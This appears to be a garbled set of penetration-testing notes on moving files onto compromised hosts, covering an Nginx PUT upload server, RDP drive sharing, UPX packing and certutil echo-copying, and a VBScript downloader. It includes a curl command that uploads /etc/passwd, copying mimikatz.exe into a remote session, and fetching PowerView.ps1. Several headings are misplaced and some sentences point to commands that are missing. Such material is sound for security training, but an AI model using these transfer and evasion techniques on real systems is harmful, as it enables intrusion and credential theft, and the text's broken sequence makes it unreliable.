A good alternative for transferring files to Apache is because it is configuration is less complicated, and the module system does not lead to security issues like Apache can do.
Nginx Enable PUT
# 1-Create a directory to handle uploaded files
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
# 2-Change the owner to www-data
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory
# 3-Create the NGINX Configuration file, by creating the file /etc/nginx/sites-available/upload.conf with the contents:
server {
listen 9001;
location /SecretUploadDirectory/ {
root /var/www/uploads;
dav_methods PUT;
}
}
# 4-Symlink our site to the sites-enabled directory.
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
# Start Nginx
sudo systemctl restart nginx.service
# IF ANY ERROS OCCURS check /var/log/nginx/error.log
# if we see there is already a module listening on port 80 remove default nginx conf
sudo rm /etc/nginx/sites-enabled/default
# we can then test upload by using cuurl and put
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
tail -1 /var/www/upload/SecretUploadDirectory/users.txt
In some cases, computers will not allow anonymous SMB connections. In this case, we may want to use the user/password flags to allow authentication on our SMB server. This can be done with the following command:
In newer versions of Windows, the Install-WindowsFeature PowerShell cmdlet can also be used. Both DISM and Install-WindowsFeature require administrative access.
PS C:\> Install-WindowsFeature TFTP-Client
RDP
Remote Desktop is often enabled on Windows machines, and from Linux, rdesktop can be used to expose a local folder in the remote RDP session.
After selecting the drive, we can interact with it in the remote session as follows:
copy \\tsclient\c\temp\mimikatz.exe .
Echo Copy
On machines with a very stringent lockdown policy, it may be necessary to echo copy files.
upx --best nc.exe
c:\> upx.exe --best nc.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
File size Ratio Format Name
-------------------- ------ ----------- -----------
59392 -> 29696 50.00% win32/pe nc.exe
Packed 1 file.
Next, we need to convert the binary data to base64. Windows contains a native utility that can do this - certutil.
PS C:\> certutil.exe -encode nc.exe nc.txt
Open the resulting text file in a text editor that supports the replacement of extended characters (\n \r \t \0 \x...), such as Notepad++. Replace newlines with echo ".
Find:\n
Replace:echo "
The first line doesn’t contain this, so we can manually prepend echo " to the first line. Next, we replace with " >> nc.txt.
FTP Transfer
Find:\r
Replace:" >> nc.txt
If the last line has an echo " on its own, remove it.
Next, copy all the text, and paste it into the shell, pressing enter if needed on the last command. This time, use the -decode certutil switch to convert the base64 text back to binary.
VBScript
The following VBScript, based on this post can be used.
Code: vbscript
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2
end with
It can be executed as follows.
Decryption
PS C:\htb> cscript /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
In case SMB traffic through the firewall has been restricted, may be a good option, as it relies on HTTP as a transport protocol.
OpenSSH server can be enabled using this . On older Windows systems, the PuTTY Secure Copy client (pscp.exe) can be used.
Echo copying files is very inefficient and can result in a large amount of data being transferred across the clipboard, so we can use an executable packer such as to make the source file as small as possible.
The following JavaScript, based on post, can be used.
